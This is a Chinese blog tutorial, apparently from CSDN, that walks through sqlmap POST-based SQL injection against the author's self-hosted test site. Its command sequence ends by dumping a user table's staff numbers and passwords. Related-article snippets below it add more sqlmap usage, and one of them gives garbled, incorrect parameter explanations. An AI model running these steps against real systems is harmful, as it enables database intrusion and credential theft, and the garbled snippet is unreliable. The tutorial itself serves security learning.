利用sqlmap进行post注入(实操)

最新推荐文章于 2024-09-18 15:04:23 发布
最新推荐文章于 2024-09-18 15:04:23 发布
阅读量3.9k 收藏 29
点赞数 4
分类专栏: 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/peanut5036/article/details/128423427
版权

本次实验使用的网站是博主自己搭建的一个简单的信息管理系统

1、配置浏览器代理,并打开burp

 2、打开网站,工号和密码随便填写,点击登录

3、通过burp拦截到数据包

4、将拦截到的数据包保存为文本文件

 

5、打开sqlmap,对该网站进行扫描

sqlmap -r /root/test/1.txt

扫描得到数据库和服务器的版本

扫描数据库

sqlmap -r /root/test/1.txt --dbs

结果得到9个数据库

 

 指定数据库为salary_management,继续扫描表名

sqlmap -r /root/test/1.txt -D salary_management --tables

结果得到5个表

  

我们比较关心user表中的内容,再进一步对user表中的列名进行扫描

sqlmap -r /root/test/1.txt -D salary_management -T user --columns

可以得到user表中的各个列名与对应的类型

由于登录时需要用到“工号”和“密码”,所以我们把这两列中的内容列出来

sqlmap -r /root/test/1.txt -D salary_management -T user -C "staff_number,password" --dump

 最后得到工号和对应的密码

 由于网站是自己搭建的,我们可以查看网站的数据库

可以发现工号和密码与使用sqlmap扫描出来的一致 

 

ltachl
关注
专栏目录
利用sqlmapapi进行批量检测sql注入
03-28
本程序利用百度爬取特定的url链接,然后调用sqlmapapi(sqlmap自带的批量接口),进行注入的判断。 AutoSqli.py中option的设置可参考set_option.txt;可自定义判断注入的方法,例如,基于时间/布尔等。
sqlmap使用之-post注入、head注入(ua、cookie、referer)
weixin_51520483的博客
07-11 1082
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
sql注入sqlmap使用
m0_71866532的博客
03-23 3180
其中参数“-T”用于指定表名称,“--columns”参数用于指定列出表中字段。#其中参数“-D”用于指定数据库名称,“--tables”参数用于列举表。#其中参数“-C”用于指定字段名称,参数“—dump”用于导出数据。#其中“-r”参数用于指定注入点的导出流量包的绝对路经文件。#,其中参数“--dbs”用于列举数据库。”参数用于指定列出表中字段。”用于指定字段名称,参数“”用于指定数据库名称,“1.打开sqlmap。”用于指定表名称,“
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
shanguicsdn111的博客
09-18 1445
提示:SQLmap不能直接「扫描」网站漏洞,先用其他扫描工具扫出注入点,再用SQLmap验证并「利用注入点。检测「post请求」的注入点,使用BP等工具「抓包」,将http请求内容保存到txt文件中。参数,指定需要检测的url,单/双引号包裹。风险级别(0~3,默认1,常用1),级别提高会增加数据被篡改的风险。搜索数据库中是否存在指定库/表/字段,需要指定库名/表名/字段名。就是 all 的意思,获取所有能获取的内容,会消耗很长时间。指定目标「数据库」,单/双引号包裹,常配合其他参数使用。
【PTE】SQL注入(二)
HkD01L的博客
11-19 846
CISP-PTE国家注册信息安全渗透测试工程师课程笔记SQL注入、布尔盲注、时间盲注、延时注入、万能密码
sqlmap post注入
zhaozhanyong的专栏
11-19 5996
0x00 常用的 注入点:http://tetasp.vulnweb.com/Login.asp 几种注入方式: sqlmap -r search-test.txt -p tfUPass 其中search-test.txt的内容为以下所抓的post包 0x01 常参数的 sqlmap -r search-test.txt -p tfUPss 0x02 常参数的 sql
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 3038
使用sqlmap进行post注入学习笔记
利用sqlmap进行POST注入
热门推荐
lwpoor123的博客
12-24 12万+
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,-p指定参数 其中出现了三次提示: it looks l...
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 5051
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
Sqlmap -- POST注入
weixin_41489908的博客
07-07 2989
想归想,难过归难过,若你岁岁平安,我可生生不见。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包获取提交的数据 2、sqlmap -u "http://192.168.139.129/pikachu/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --data指定提交的数据 运行结果:id值存在注入,可能是布尔盲注、报错注入、时间盲注、联合注入 [14:37:09]...
mysql post 注入工具_Sqlmap POST注入 三种方法(转载)
weixin_39778582的博客
01-19 1133
不管怎么说?使用工具Sqlmap POST注入都会简单很多,具体说说Sqlmap POST注入 三种方法吧!一、自动填写表单自动填写表单是Sqlmap工具POST注入的第一种方法,具体步骤如下:1、判断是否有post注入?root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms出来的提示,一路回车就可以了!结果如下图:从这里,可以得...
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
通过selenium和flask中转后利用sqlmap进行注入ReberBlog1
08-03
sqlmap利用这些数据尝试进行SQL注入攻击。 5. **结果反馈**:sqlmap执行注入测试后,将结果返回给Flask,然后Flask可以进一步处理这些信息,如显示在本地控制台或者存储以供后续分析。 这个案例展示了在面对复杂...
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix...
java开发基于SQLmap的SQL注入工具源码.zip
06-01
基于SQLmap的SQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmap的SQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx)...
sqlmap使用教程
weixin_57048716的博客
11-26 1838
常用步骤: 1.探测数据库名 --dbs --batch 2.探测表名 -D 库名 --tables --batch 3.探测字段名 -D 库名 -T 表名 --columns --batch 4.探测字段值 -D 库名 -T 表名 -C username(字段),password --dump --batch
史上最详细sqlmap入门教程
weixin_44867191的博客
05-16 1万+
最近做安全测试,遇到了SQL盲注的漏洞,从发现漏洞,确认漏洞,协助开发复现漏洞,验证漏洞一整套流程下来,有了亿点点收获,下面分享给大家,希望对软件测试同学有所启发,难度不大,小白看完也能上手的那种。
sql注入post 传参方式的注入
没有故事
02-27 1269
sqlmap -r ./sqlmapfile(-r 捕获的请求文件及其所在位置) -p id(加入指定参数) --cookie=""先将post请求在burp捕获,将抓到的请求内容保存到文件中,在sqlmap安装 目录下面新建文本文件为x.txt。是否存在注入点,注入点在有和数据库服务器交互的地方。加入-p 指定参数 -p id。在输入框里面进行注入
写出使用sqlmap进行post注入的三种方式的参数语句
09-11
SQLMap是一款著名的SQL注入自动化工具,它支持多种攻击方式和注入技巧。以下是使用SQLMap进行POST注入的三种常见参数语句: 1. **GET请求注入** (适用于表单提交): ```bash sqlmap -u "http://example.com/login.php?username=admin&password=<PASSWORD>" --data="username=param&password=<PASSWORD>" ``` 这里`<username>`和`<password>`是目标参数名,`<param>`是要注入的恶意SQL。 2. **POST请求注入** (适用于HTTP POST): ```bash sqlmap -p 8080 -U admin -P '123456' --data='username=admin&password=<PASSWORD>' ``` `-p`选项指定端口,`-U`和`-P`用于模拟登录数据,其中`admin`和`123456`是用户名和密码字段,`<password>`包含恶意SQL。 3. **文件上传注入** (如果存在文件上传功能): ```bash sqlmap -f /path/to/file.txt --data=@"file.txt" ``` `--data=@"file.txt"`表示从指定文件读取数据,`file.txt`中包含待注入的SQL。 请注意,实际使用时应将`<password>`替换为适当的SQL命令,并确保遵守道德规范以及法律法规。此外,SQLMap应在安全环境下运行,避免对未经授权的目标发起攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ltachl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值